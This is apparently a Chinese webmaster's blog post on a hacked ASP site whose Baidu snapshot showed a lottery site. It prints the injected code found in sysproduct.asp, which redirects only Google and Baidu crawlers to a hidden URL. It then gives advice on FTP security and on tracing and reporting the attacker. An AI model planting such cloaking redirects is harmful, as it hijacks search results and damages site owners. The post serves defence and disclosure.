黑客是怎么篡改百度快照的？

　　写本篇文章的目的在于揭露一种黑客作弊的手段，也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。

　　前几日，我的客户电话说自己的百度排名没有了，查询下竟然百度标签显示的内容是一家彩票平台的网站内容。 我知道网站被黑客加入了非法代码，恶意篡改了百度快照。(截图如下)

　　查看“百度快照”出现的是一组跳转网站的广告内容。我们对客户设置的网站信息消失了。

　　1、黑客是如何修改百度快照的呢?

　　我进行了排查，客户的网站是使用asp源码开发的。发现有个文件被黑客写入了一段代码。

　　路径：inc文件夹—sysproduct.asp文件里面最底下添加了如下代码：

<%

function getbot()

dim s_agent

getbot=""

s_agent=request.servervariables("http_user_agent")

if instr(1,s_agent,"googlebot",1) > 0 then

getbot="google"

end if

if instr(1,s_agent,"baiduspider",1) > 0 then

getbot="baidu"

end if

end function

if getbot="baidu" or getbot="google" then

'

response.redirect "http://*********"（跳转的网站，引导百度抓取的内容）

else

'

response.write""

end if

%>

　　黑客设置的这串代码导致百度爬虫抓取网页的时候，直接抓取越过客户网站抓取了跳转网站内容，导致百度快照里面显示的是别的内容。使得客户本来排名首页的网站直接被百度屏蔽了。造成了客户很大的损失。

　　2、那么黑客是如何进入后台的呢?

　　黑客要进入后台，必须知道ftp账户和密码，以及ip地址。

　　造成的原因有如下几种：

　　1)一方面是ftp密码设置的时候比较简单化，很容易被利用软件破解掉，

　　2)另一方面选择便宜的空间也是一种隐患。因为空间ip以及用户名是很难被知道的，除非有人提供。

　　3、网站被黑之后，你如何追查黑客的来源?

　　方法比较简单，就是查询你跳转的目标网站的域名信息。一般情况下，都是一些小型的站长开发的赚钱网站，通过查询域名信息你可以获知该域名的归属人是谁，他有可能就是黑你网站的人。

　　如果是比较大型的网站利用外包的方式进行推广，那么你也可以得知负责人，给百度或者是网络警察举报一下，该网站存在恶意攻击修改内容的行为，毕竟它也有一定得责任。

　　通过中国万网whois域名查询：比如我客户跳转的彩票网站的域名信息如下：

　　1)第一个是：注册人

　　2)第二个是：联系电话

　　3)第三个是：联系邮箱

　　基本上你联系注册人就可以解决问题。如果对你客户造成的损失太大的话，建议你通过以下方式进行维权：

　　违法和不良信息举报中心：

　　12321网络不良与垃圾信息举报受理中心：

　　国家互联网应急中心网络安全举报中心：

　　中国反钓鱼网站联盟认定及处理流程：

　　*部信息网络安全报警网站：

　　中国扫黄打非网：

　　北京市*局网络违法犯罪举报网站：

　　希望本篇文章对你防黑有帮助。